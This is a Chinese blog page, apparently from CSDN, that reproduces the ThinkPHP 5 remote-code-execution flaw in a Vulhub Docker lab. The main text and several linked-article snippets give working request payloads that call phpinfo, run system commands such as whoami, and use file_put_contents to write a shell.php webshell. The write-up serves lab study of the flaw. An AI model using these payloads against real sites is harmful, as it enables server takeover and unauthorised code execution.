Thinkphp 5-rce 漏洞复现(vulhub)

最新推荐文章于 2024-09-07 12:47:12 发布
最新推荐文章于 2024-09-07 12:47:12 发布
阅读量382 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/MDSEC/article/details/132398086
文章讲述了ThinkPHP5中的控制器名处理问题,导致在默认情况下可执行任意方法,引发现远程命令执行漏洞。详细描述了复现漏洞的过程,包括使用phpinfo和file_put_contents等函数进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞原因:

ThinkPHP其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞

复现过程:

1.在虚拟机中拉去thinkphp 5-rce镜像

 2.访问本机地址

输出关于php的配置信息

index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

 执行命令 whoami

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

最低0.47元/天 解锁文章

200万优质内容无限畅学
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2750
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
vuhub thinkphp-5-rce漏洞复现
qq_46804551的博客
04-24 664
搭建 your-ip:8080 搭建成功 漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
thinkphp5 RCE漏洞复现
feng的博客
03-03 3757
前言 之前看的是tp3的SQL注入,现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE,毕竟thinkphp最广为人知的漏洞就是RCE。 首先是源码的下载,我从这里下载: thinkphp下载 这里我下载的是thinkphp5.0.22完整版,如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样,RCE的执行点也都是重要的request类。关键在于这个filterValue()函数: /** * 递归过滤给定的值 * @param mixe
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce5.0.23-rce5-rce漏洞复现(详细图解)
鱼溯的博客
02-02 2341
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce5.0.23-rce5-rce漏洞复现(详细图解)
vulhub-thinkphp漏洞复现
qq_51922767的博客
09-14 2873
vulhub-thinkphp漏洞复现
ThinkPHP V5RCE(远程代码执行漏洞
Home to come
04-18 2228
一、Shell脚本基础知识 1.Shell 输入/输出重定向 常见重定向符号: 1)标准输出 > 覆盖重定向 set -C 关闭覆盖重定向的功能 set +C:恢复 >| 强制重定向 >> 追加重定向 2)标准输入 < a<b :把b交给a执行 tr 替换文件内容(tr set1 [set2])char(字符:一个...
vulhubthinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
m0_75036923的博客
09-07 894
【代码】【vulhubthinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
Thinkphp 2-rce 漏洞复现vulhub
MDSEC的博客
08-20 381
首先,你需要在本地或虚拟机上搭建一个运行Vulhub的环境。你可以从Vulhub的GitHub仓库中下载并安装Docker和docker-compose工具,然后克隆对应的ThinkPHP 2漏洞利用环境。在浏览器中,你将看到一个简单的ThinkPHP应用程序。根据漏洞描述,你需要在URL中添加参数来触发漏洞。如果成功利用漏洞,你将在浏览器中看到返回的结果,例如当前用户的信息。将上述URL参数添加到应用程序的URL后面,然后按回车键执行请求。进入ThinkPHP 2漏洞利用环境所在的目录,打开。
thinkphp系列漏洞复现(组合拳-vulhub里的)
m0_58596609的博客
01-07 1597
thinkphp系列漏洞复现(组合拳)
thinkphp 5-rce版本漏洞复现(超详细版)
热门推荐
精品博客,你值得一看~
08-06 1万+
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码。(3)还可以将php代码写入文件, 此处我们写一个phpinfo。(1)在url输出关于 PHP 配置的信息。说明存在远程命令执行漏洞!ip a #获取自己的本机 ip。(4)查看shell.php内容。直接访问 ip+端口。
Think PHP 5 RCE漏洞复现及排查
dayouzi的博客
08-11 2795
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞
vulhub靶场之thinkphp】——(5-rce
weixin_57240513的博客
08-07 651
docker-compose ps//查看开启的端口。
Thinkphp5~6多语言文件包含到rce漏洞复现and详细分析解析
君逍遥o
09-08 2088
Thinkphp5~6多语言文件包含到rce漏洞复现and详细分析解析
Thinkphp 5-RCE漏洞复现
Tender*的博客
08-10 1158
ThinkPHP5披露最多得漏洞就是RCE,其中的影响版本范围非常广漏洞原理其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。影响版本不同版本 payload 不同,且5.13版本后还与debug模式有关漏洞复现进入​。
vulhub系列之thinkphp(2-rce5.0.23-rce5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1795
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7646
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
thinkphp5.*远程命令执行漏洞复现
weixin_42075643的博客
01-27 687
ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http://127.0.0.1/tp5/public/index.php/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令] 用B
thinkphp5远程代码执行漏洞分析()
weixin_30482383的博客
08-28 679
payload 测试版本thinkphp5.1beta url =>http://127.0.0.1/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1 漏洞...
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 1万+
ThinkPHP5系列远程代码执行漏洞复现(详细)
docker 支持的靶机
最新发布
03-27
<think>好的,我现在需要回答用户关于Docker支持的靶机类型及配置方法的问题。首先,我得理解用户的需求。用户提到“靶机”,通常指的是用于安全测试、漏洞演练的环境,比如Vulhub这样的漏洞靶场。所以,用户可能想知道如何利用Docker来搭建不同类型的漏洞测试环境,以及具体的配置步骤。 接下来,我需要回忆一下Docker的相关知识。Docker本身是一个容器化平台,允许用户快速部署应用。而靶机类型可能包括各种预配置了漏洞的环境,比如Web应用漏洞、系统漏洞等。常见的项目有Vulhub、OWASP Juice Shop、Metasploitable等。这些项目通常提供Docker镜像,方便用户一键部署。 然后,配置方法方面,用户需要知道如何安装Docker,拉取镜像,运行容器,设置网络和持久化存储等。同时,可能还需要调整防火墙设置,确保容器可以访问。例如,参考用户提供的引用[4],提到了使用阿里云的镜像源安装Docker,这可能是在国内加速下载的方法。引用[2]提到了设置Docker自启动,这也是配置的一部分。 我还需要注意用户提到的引用内容,比如引用[3]中提到的Vulhub和Docker Desktop的配置问题,这可能涉及到在Windows环境下使用Docker时的防火墙设置。引用[1]和[2]涉及Docker版本查看和系统服务配置,这些都是基础步骤。 接下来,我需要组织信息,分步骤说明支持的靶机类型和配置方法。可能需要先介绍常见的靶机项目,然后详细步骤包括安装Docker、配置镜像加速、拉取靶机镜像、运行容器、访问靶机等。同时,要提醒用户注意安全,因为靶机通常包含漏洞,应在隔离环境中使用。 另外,用户可能遇到的问题,比如网络配置、持久化数据、多容器编排,这些也需要提及。例如,使用docker-compose来管理多个服务,或者设置网络模式让靶机与外部通信。 最后,生成相关问题,帮助用户深入理解,比如如何自定义靶机镜像、优化性能、安全隔离措施等。</think>### Docker支持的靶机类型及配置方法 Docker支持多种类型的靶机环境配置,主要用于安全测试、漏洞复现和攻防演练。以下是常见靶机类型及配置方法: --- #### 一、支持的靶机类型 1. **Web漏洞靶机** - **Vulhub**:提供多种Web漏洞环境(如ThinkPHP RCE、Jenkins RCE),使用Docker Compose一键部署[^3]。 - **OWASP Juice Shop**:模拟包含常见Web漏洞的在线商店,支持Docker镜像直接运行。 2. **系统漏洞靶机** - **Metasploitable**:预置SSH弱密码、FTP漏洞等系统级漏洞,镜像可通过Docker快速启动。 3. **CTF靶机** - **CTFd + 题目容器**:通过Docker部署CTFd平台,并绑定独立题目容器(如SQL注入、逆向工程环境)[^4]。 --- #### 二、基础配置方法 1. **安装Docker** - 使用阿里云镜像加速安装(适用于Linux): ```bash yum-config-manager --add-repo https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo yum install docker-ce systemctl start docker && systemctl enable docker # 设置自启动[^2] ``` - 验证版本:`docker --version`(如Docker 19.03.11)[^1]。 2. **拉取靶机镜像** - 例如部署Vulhub: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/漏洞目录 && docker-compose up -d ``` 3. **访问靶机** - 查看容器IP及端口:`docker ps` - 通过浏览器访问`http://宿主机IP:映射端口`,需确保防火墙放行端口。 --- #### 三、高级配置技巧 1. **持久化存储** 使用`-v`挂载数据卷保存靶机状态: ```bash docker run -d -v /宿主机路径:/容器路径 镜像名 ``` 2. **网络隔离** 创建独立网络避免干扰: ```bash docker network create vuln-net docker run --network=vuln-net 镜像名 ``` 3. **多容器编排** 使用`docker-compose.yml`定义复杂环境(如数据库+Web应用): ```yaml version: '3' services: web: image: vulhub/tomcat:latest ports: ["8080:8080"] db: image: mysql:5.7 environment: MYSQL_ROOT_PASSWORD=123456 ``` --- #### 四、注意事项 - **安全性**:靶机环境需在隔离网络中使用,避免暴露到公网。 - **资源分配**:通过`--memory`和`--cpus`限制容器资源,防止占用过高。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值